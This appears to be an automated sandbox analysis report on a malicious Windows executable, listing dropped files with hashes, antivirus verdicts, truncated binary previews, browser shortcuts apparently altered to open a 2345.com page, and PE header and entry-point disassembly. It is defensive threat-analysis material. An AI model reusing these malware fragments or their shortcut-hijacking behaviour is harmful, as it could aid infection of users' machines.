                                                          Preview:MDMP..a..... ........".f............t...............|...........hQ..........T.......8...........T............;.............. !...........#..............................................................................eJ.......#......GenuineIntel............T............!.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):6272
                                                          Entropy (8bit):3.7193079222702745
                                                          Encrypted:false
                                                          SSDEEP:96:RSIU6o7wVetbYI6lqY2TpqKe5aMQUT89b3bsfnsudm:R6l7wVeJYI6lqY2EpDT89b3bsfnjdm
                                                          MD5:E90B2356997092C2392D7BF8FCAECB0F
                                                          SHA1:576AE2C4D265E75BF15A25EDA0964F1924D85F9C
                                                          SHA-256:803F50C03E183F65968FDCFC649E342EDABE089E794774F3B08834AACB20857D
                                                          SHA-512:E8C219A7DE2491FE7DFA6AC10EFD67EDEFBB62B6A1CBA7FCA377612D5D5E09C9FF0A0F19DE03B535F0AE075F257B9315BCB8E1B4BEF633BDB22232C6C0AEBD2F
                                                          Malicious:false
                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.6.8.<./.P.i.
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4551
                                                          Entropy (8bit):4.454677236908679
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwWl8zsfNJg77aI9Q7WpW8VYbYm8M4JQQFE+q8yCt2gYhdd:uIjffnI76K7VPJMyt2gYhdd
                                                          MD5:8DD6F128A103B98F48C67D907FEC12C3
                                                          SHA1:EBB4217B53ED76C8001BCD2DBBD3D80E3C16292F
                                                          SHA-256:A4FEF16E61465F878AEF0D3A2366C133F63B613C318D3DE6B7446A14B1234757
                                                          SHA-512:586EE1490F49146C59B07A097C7080F29335A2646C7784E7F26CAEAC0C5540A15EF9914DC31A45D78D3EAA01F00A8460AADC5803D49D9B48A072CC8FA6E39334
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="426302" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):80842
                                                          Entropy (8bit):3.0782944694071652
                                                          Encrypted:false
                                                          SSDEEP:768:di5cuso8szd0FgW2hz4OAQUd8WxgaK2R1jpyOLhbZV5R08iwSGB7:wC28o0FgW2hznE8W5K2R5j1br5R0rhw
                                                          MD5:D2FB00876F18C38DC2F316CD115B23B4
                                                          SHA1:1162CC797C39EFCE96F732138B5492664D7CE6AE
                                                          SHA-256:3DE6B7B77265539D11D683BF9E2929AB24B97554045EA3A0CD5A327B1CA691C4
                                                          SHA-512:589725DC61EA10708BCBFBF58A73E263CE37ADA3BF69B6CD5226DDCB7AE924CF9F9632A1E0C4EB8044E0E869B8E7541E958F4C23A8839957380F9AF3954B8645
                                                          Malicious:false
                                                          Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):13340
                                                          Entropy (8bit):2.685816947315613
                                                          Encrypted:false
                                                          SSDEEP:96:TiZYWnxCgXb0TYRYDW8HhUYEZQEtEip4mytw7zbd/nah8kMj4tIXh13:2ZDxumC6/Nnah8kMj4yXD3
                                                          MD5:228C8ABE870DB7561C51B32CCECBECA6
                                                          SHA1:F309E06779536FAD12CD502F205358EB3A563D85
                                                          SHA-256:80B6C80DEEA6C05A0BC3F72D5DE05E7F6A76C3505BD81ADB4B5BCA0C3D934E16
                                                          SHA-512:AB30347F17AEF9C2F0E822B29E7F9F5EE2507297403131E58383CC40295EE66620ED95DCD7516BCBE50951919F4722DAEDC1EA7E7BCC6CF93B3E20CF90E76BFB
                                                          Malicious:false
                                                          Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                          Process:C:\Users\user\AppData\Local\Temp\VSFdoO.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):4
                                                          Entropy (8bit):1.5
                                                          Encrypted:false
                                                          SSDEEP:3:Nv:9
                                                          MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                          SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                          SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                          SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                          Malicious:false
                                                          Preview:foo.
                                                          Process:C:\Users\user\AppData\Local\Temp\VSFdoO.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):4
                                                          Entropy (8bit):1.5
                                                          Encrypted:false
                                                          SSDEEP:3:Nv:9
                                                          MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                          SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                          SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                          SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                          Malicious:false
                                                          Preview:foo.
                                                          Process:C:\Users\user\Desktop\LisectAVT_2403002B_48.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):15872
                                                          Entropy (8bit):7.031075575407894
                                                          Encrypted:false
                                                          SSDEEP:384:IXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:gQGPL4vzZq2o9W7GsxBbPr
                                                          MD5:F7D21DE5C4E81341ECCD280C11DDCC9A
                                                          SHA1:D4E9EF10D7685D491583C6FA93AE5D9105D815BD
                                                          SHA-256:4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
                                                          SHA-512:E4553B86B083996038BACFB979AD0B86F578F95185D8EFAC34A77F6CC73E491D4F70E1449BBC9EB1D62F430800C1574101B270E1CB0EEED43A83049A79B636A3
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Joe Sandbox View:
                                                          • Filename: LisectAVT_2403002B_470.exe, Detection: malicious, Browse
                                                          • Filename: LisectAVT_2403002B_482.exe, Detection: malicious, Browse
                                                          • Filename: LisectAVT_2403002B_498.exe, Detection: malicious, Browse
                                                          • Filename: LisectAVT_2403002B_498.exe, Detection: malicious, Browse
                                                          • Filename: LisectAVT_2403002B_50.exe, Detection: malicious, Browse
                                                          • Filename: LisectAVT_2403002B_61.exe, Detection: malicious, Browse
                                                          • Filename: LisectAVT_2403002B_65.exe, Detection: malicious, Browse
                                                          • Filename: LisectAVT_2403002B_72.exe, Detection: malicious, Browse
                                                          • Filename: LisectAVT_2403002B_7.exe, Detection: malicious, Browse
                                                          • Filename: LisectAVT_2403002B_72.exe, Detection: malicious, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I.>.'..'.>.'..\.2.'.#.(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\SGuard.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Tue Oct 3 10:50:01 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
                                                          Category:dropped
                                                          Size (bytes):2356
                                                          Entropy (8bit):3.576995670621103
                                                          Encrypted:false
                                                          SSDEEP:48:8SLdpT63ERYrnvDdAKRkdAadAKR+/KRllygP:8SbEMly
                                                          MD5:E6D21A534443C413527D797090EC5DB8
                                                          SHA1:90731DDFC385AB53786906D089B190057FCD6591
                                                          SHA-256:E0F7F9C24C524C67A301779AE46224B8F4BD58ED0F0030A2C5541E61E3AC27E2
                                                          SHA-512:9DAEE07D180014AF2194569325083CF40B171A380553CD98A97304E5CA5C07FF13A43B5C47747135F7BAE6A1E7BCBB25263C135D5FD358B3E93990E9E825DAC2
                                                          Malicious:false
                                                          Preview:L..................F.@.. ......,....Tb.........q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....CW}W..PROGRA~1..t......O.ICW}W....B...............J.....7...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VCW.W....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VCW.V....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VCW.W..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VCW.W..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.G.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n...w.w
                                                          Process:C:\Windows\SGuard.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Thu Aug 5 21:41:46 2021, mtime=Tue Oct 3 10:48:05 2023, atime=Thu Aug 5 05:45:01 2021, length=3311504, window=hide
                                                          Category:dropped
                                                          Size (bytes):2416
                                                          Entropy (8bit):3.665420467091212
                                                          Encrypted:false
                                                          SSDEEP:48:8UZndO5fLswOnzTdRdZdLXuHj0PkZyl7:88xuD0PkZy
                                                          MD5:37643BAE4E3B14CB16AE05FC891DDD95
                                                          SHA1:51EA1852843B0B62CFE57B73D1446A62E4C2E7FC
                                                          SHA-256:21A72C218699514DE6094918F9368C741EE36D5F96DB3946544D7E414740E377
                                                          SHA-512:C88DBA365DBEBD82F1191CB7D69B947066D8933815B856DE4EBF9FA087D3DD9445E6FEAF0C27EA2338D911DBD74C412473A1FE3D4C3B8621F5087614E33EED76
                                                          Malicious:false
                                                          Preview:L..................F.@.. .....|.K.....x......zj.....2.....................1....P.O. .:i.....+00.../C:\.....................1.....CW.X..PROGRA~2.........O.ICW.X....................V.......E.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....\.1.....CW.?..MICROS~1..D......(Ux.CW.U..........................w.o.M.i.c.r.o.s.o.f.t.....N.1.....CW.?0.Edge..:.......S8.CW.U...........................f .E.d.g.e.....`.1.....CW.H0.APPLIC~1..H.......S8.CW.U...........................L).A.p.p.l.i.c.a.t.i.o.n.....`.2...2..S.5 .msedge.exe..F.......S8.CW.V...........................t..m.s.e.d.g.e...e.x.e.......k...............-.......j............F.......C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe....B.r.o.w.s.e. .t.h.e. .w.e.b.N.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.1.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.
                                                          Process:C:\Windows\SGuard.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Tue Oct 3 09:48:42 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
                                                          Category:dropped
                                                          Size (bytes):2397
                                                          Entropy (8bit):3.6090694468662234
                                                          Encrypted:false
                                                          SSDEEP:48:8S7dBT6DpRYrnvs4dAKRkdAadAKR+/KRlay8Ec:8SnhOayd
                                                          MD5:8C50330A714940F48B261FFCB154A6C5
                                                          SHA1:001EF6CA8668EB044CE8250634E7AB56C207C5EE
                                                          SHA-256:DEF6728849F30A161CCB95483EE2301B9EEFEFD6CBF97710ECA09297F76912EE
                                                          SHA-512:E2F1BD7403F7D466126E918EAA701F63CCDBE620F7BD3EC139E873097538CB12F8AFB1A6DD121923F15C32A1A99230DCB44AC199CC75E3005368A9BE7D7CFE56
                                                          Malicious:false
                                                          Preview:L..................F.@.. ......,.....=.,.......q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....CW.V..PROGRA~1..t......O.ICW.V....B...............J.....p+j.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VCW.V....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VCW.V....M.....................G-..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VCW.V..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VCW.V..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.M.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t
                                                          Process:C:\Windows\SGuard.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Archive, ctime=Thu Sep 8 02:07:23 2022, mtime=Tue Oct 3 10:02:25 2023, atime=Thu Sep 8 02:07:23 2022, length=834512, window=hide
                                                          Category:dropped
                                                          Size (bytes):1390
                                                          Entropy (8bit):4.593261442477821
                                                          Encrypted:false
                                                          SSDEEP:24:8C7+MdSwfiEMhn/AIkcSgdCEMBCegYJdcaiYHtIX/8UqyFm:8CTdlfivhnIXgdCvBCdowAIX/wyF
                                                          MD5:1CE9F20F82EB0512D0F0C2130E0492C3
                                                          SHA1:E32D95B1409C3431F8BF8F97BA1E4980B0E90F30
                                                          SHA-256:723FC7837587763FAE7F14AA6751AFABD12F79B366C70AC90B0056A9E5EADBC0
                                                          SHA-512:2A9EA35A6C8DF8F9CEA3DA335DB643CD4B64058F3BA307C48F667CEACCEBB588204CC8EF68B0C1960F60146EE9D9D6A574ACD88CF2C55AA633EECF9341887CBD
                                                          Malicious:false
                                                          Preview:L..................F.... ....L..0...7........L..0...............................P.O. .:i.....+00.../C:\.....................1.....CW}W..PROGRA~1..t......O.ICW}W....B...............J.....7...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1.....(Um...INTERN~1..T......O.ICW.V...........................b..I.n.t.e.r.n.e.t. .E.x.p.l.o.r.e.r.....f.2....(U.. .iexplore.exe..J......(U..CW$V.....m..........|.........$.k.i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]............F.......C:\Program Files\Internet Explorer\iexplore.exe..&.@.".%.w.i.n.d.i.r.%.\.S.y.s.t.e.m.3.2.\.i.e.4.u.i.n.i.t...e.x.e.".,.-.7.3.2.G.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.I.n.t.e.r.n.e.t. .E.x.p.l.o.r.e.r.\.i.e.x.p.l.o.r.e...e.x.e...%.H.O.M.E.D.R.I.V.E.%.%.H.O.M.E.P.A.T.H.%...w.w.w...2.3.4.5...c.o.m./.?.3.1.1.3.3.-.4.0.1.5.........&................c^...NI..e.2.......`.......X.......desktop-aget0tr..hT..CrF.f4... ..$.(.a......).;.hT..Cr
                                                          Process:C:\Users\user\Desktop\LisectAVT_2403002B_48.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                          Category:dropped
                                                          Size (bytes):1133056
                                                          Entropy (8bit):7.775666202462079
                                                          Encrypted:false
                                                          SSDEEP:24576:0yM4Tfbs603xoJQ7GSYMMHF9SGCV19TgumbhlIWDM1A:FTfT0qJ9SxMHDXCPlgumbAWH
                                                          MD5:8371EA1D8636CBC2A62A9C10FA395E9F
                                                          SHA1:72AA3E37A168A5F88E894CBA1AB6EB17AF52EDC2
                                                          SHA-256:E6C47B8DBAD042BEC1E068C7AA25643235C85BED2BA4F2716E5DD6AFBB241B1F
                                                          SHA-512:6F05A663D7F51B1F8C6BC008B45A25C67816F8E860F8F480B43EEF37DB9D7E843360E6BA8CD3D2C7FF7D9F0113053D158CB5CBE59A180C3176B6A09EA593AC16
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.C...-...-...-.x.!...-...#...-.l.)...-...p...-...,.^.-.5.&.'.-...-...-...&...-...)...-.Rich..-.........................PE..L...,..e...........!.....P..............................................................................................\...................................\.......................................................................................UPX0....................................UPX1.....P.......B..................@...UPX2.................F..............@......................................................................................................................................................................................................................................................................................................................................................................................4.01.UPX!....
                                                          Process:C:\Windows\SysWOW64\svchost.exe
                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1119744
                                                          Entropy (8bit):7.7679275698490615
                                                          Encrypted:false
                                                          SSDEEP:24576:iPaFbzfxmmO7CwJCGwqqiL9b6WmGeSwT/5S9Kae:tx8OJGBqCbNjeSwTU4
                                                          MD5:116A29D2FB23771FC0EF863387C51933
                                                          SHA1:E8F85EEBE3D74E6C792288E4793DC53762147A41
                                                          SHA-256:CFBFDB6E8DB54B03E91AF1D3542A920635E1C74622559B0D8B32FB606A6F84A7
                                                          SHA-512:73E09C54A7CCBEB718A8C8C7D1A9FDE97ABBC4D263CCFF3CB5913A3D903F2D3FE65F27E66D709F1113C666DBED6D9682091EC79F89E008524BDEAD471BDEE776
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......W%.<.D.o.D.o.D.oX<.n.D.oX<.n.D.o\8io.D.o\8.n.D.o\8.n.D.o\8.nLD.oX<.n.D.oX<.n.D.o.8.n.D.o.D.o@E.oX<.n.D.o.1.n.D.o.8.n.D.o.8.n.D.o.8ko.D.o.D.o.D.o.8.n.D.oRich.D.o........PE..d.....e.........."....".........0G..EV..@G....@.............................`X...........`..................................................SX......PV.......R.|............UX.$............................HV.(....IV.@...........................................UPX0.....0G.............................UPX1.........@G.....................@....rsrc........PV.....................@......................................................................................................................................................................................................................................................................................................................4.01.UPX!.$..
                                                          Process:C:\Users\user\AppData\Local\Temp\VSFdoO.exe
                                                          File Type:MS Windows registry file, NT/2000 or above
                                                          Category:dropped
                                                          Size (bytes):1835008
                                                          Entropy (8bit):4.466007856388039
                                                          Encrypted:false
                                                          SSDEEP:6144:XIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNxdwBCswSbn:YXD94+WlLZMM6YFH/+n
                                                          MD5:6729620C3F7C68A49DD8594FF62ABE76
                                                          SHA1:FE076CBB2F21576479954D00E725E16C02B53DFD
                                                          SHA-256:B166DB19714C7B485659F1B080EC538099DA184F0B2C646208A3B18E914EF25D
                                                          SHA-512:29AAB409887D911DFCB2A992CF7C0FE99E857F20E4D14BC12DA2FD948E83892A3ECDF0E91BD040DBC88EEACFF0CACB6B9973C21B3BE9FD3CD55F896B7CB46BF7
                                                          Malicious:false
                                                          Preview:regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...Uy..................................................................................................................................................................................................................................................................................................................................................a........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          File type:MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                                                          Entropy (8bit):7.9944359340532
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:LisectAVT_2403002B_48.exe
                                                          File size:1'133'568 bytes
                                                          MD5:eead4e7646c126c720e4ed71a65a57e1
                                                          SHA1:41e4415cba94a25f161b3481a72aa3ff3d862358
                                                          SHA256:fa62c037474b2042950a0c4ee438e6fda99ab4a62ea31afd29cb78b46ac24d34
                                                          SHA512:a652fb85d9d6786d9d914ff292655a1a0de379a0191d2ab67ec0dae0e5bcad329a85f88dee10be4c44292f34778a68d368c9b227bcf9391b609c542ad61a232b
                                                          SSDEEP:24576:459WznCx4VklRKwWnaZPk+0V1TsaEvWV/kXF0V5YH+:45gzG4ViHZOsWs6VuH
                                                          TLSH:013523D6D7E1ED4BC1C9D8F1B2658CB31B2E17140BBA3B79209AD4DE598A197F80C08C
                                                          File Content Preview:MZ@.....................................!..L.!Win32 .EXE...$@...PE..L...F..e.................j...r...............@....@..........................`..................................................L........!.................................................
                                                          Icon Hash:9eb3c9c909ca8b9e
                                                          Entrypoint:0x531000
                                                          Entrypoint Section:Tu3
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                          DLL Characteristics:
                                                          Time Stamp:0x65D89146 [Fri Feb 23 12:36:22 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:1bf257ade66d639c4f4d9030729290a2
                                                          Instruction
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 0000016Ch
                                                          xor eax, eax
                                                          push ebx
                                                          push esi
                                                          push edi
                                                          mov dword ptr [ebp-24h], eax
                                                          mov dword ptr [ebp-10h], eax
                                                          mov dword ptr [ebp-14h], eax
                                                          mov dword ptr [ebp-08h], eax
                                                          mov dword ptr [ebp-0Ch], eax
